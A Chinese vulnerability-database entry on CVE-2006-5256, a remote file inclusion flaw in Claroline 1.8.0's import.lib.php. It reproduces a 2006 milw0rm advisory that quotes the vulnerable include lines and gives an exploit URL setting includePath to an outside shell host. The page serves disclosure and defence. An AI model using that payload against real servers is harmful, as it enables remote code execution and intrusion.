Claroline 'claroline/inc/lib/import.lib.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111229 漏洞类型 输入验证
发布时间 2006-10-10 更新时间 2006-10-16
CVE编号 CVE-2006-5256 CNNVD-ID CNNVD-200610-191
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2510
https://cxsecurity.com/issue/WLB-2006100083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-191
|漏洞详情
Claroline1.8.0及早期版本的claroline/inc/lib/import.lib.php存在PHP远程文件包含漏洞,远程攻击者可借助includePath参数中的URL执行任意PHP代码。
|漏洞EXP
##################################################################################
# claroline <= 180rc1 Remote File Inclusion
# Download Source : http://www.claroline.net/dlarea/claroline180rc1.tar.gz
#
# Found By    : k1tk4t - k1tk4t[4t]newhack.org
# Location      : Indonesia   -- #newhack[dot]org
########################################################################
file ;
claroline/inc/lib/import.lib.php
########################################################################
bugs ; begin line 8 require_once ($includePath .  '/claro_init_global.inc.php');
   require_once ($includePath . '/lib/export_zip.lib.php');
   require_once ($includePath . '/../wiki/lib/lib.createwiki.php');
   require_once ($includePath . '/lib/pclzip/pclzip.lib.php');
 require_once ($includePath . '/lib/fileManage.lib.php');
   require_once ($includePath . '/lib/forum.lib.php');
   require_once ($includePath . '/lib/import.xmlparser.lib.php');
   require_once ($includePath . '/lib/add_course.lib.inc.php');
 require_once ($includePath . '/lib/course.lib.inc.php');
 require_once ($includePath . '/lib/sendmail.lib.php');
   require $includePath.'/lib/debug.lib.inc.php';
########################################################################
exmple and methode exploit ;
claroline/inc/lib/import.lib.php?includePath=http://shell/cmd.do?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
person;
y3dips, lirva32, the_day,(&all echo staff) nyubi,x-ace,NoGe(asiahacker),ghoz, home_edition2001,matdhule, iFX, and for all (friend's&enemy)

# milw0rm.com [2006-10-10]
|参考资料

来源:BID
名称:20444
链接:http://www.securityfocus.com/bid/20444
来源:BUGTRAQ
名称:20061010claroline<=180rc1RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/448174/100/0/threaded
来源:MILW0RM
名称:2510
链接:http://www.milw0rm.com/exploits/2510
来源:VUPEN
名称:ADV-2006-3996
链接:http://www.frsirt.com/english/advisories/2006/3996
来源:SECUNIA
名称:22364
链接:http://secunia.com/advisories/22364
来源:XF
名称:claroline-import-file-include(29426)
链接:http://xforce.iss.net/xforce/xfdb/29426
来源:SECTRACK
名称:1017044
链接:http://securitytracker.com/id?1017044
来源:SREASON
名称:1719
链接:http://securityreason.com/securityalert/1719
来源:MILW0RM
名称:2510
链接:http://milw0rm.com/exploits/2510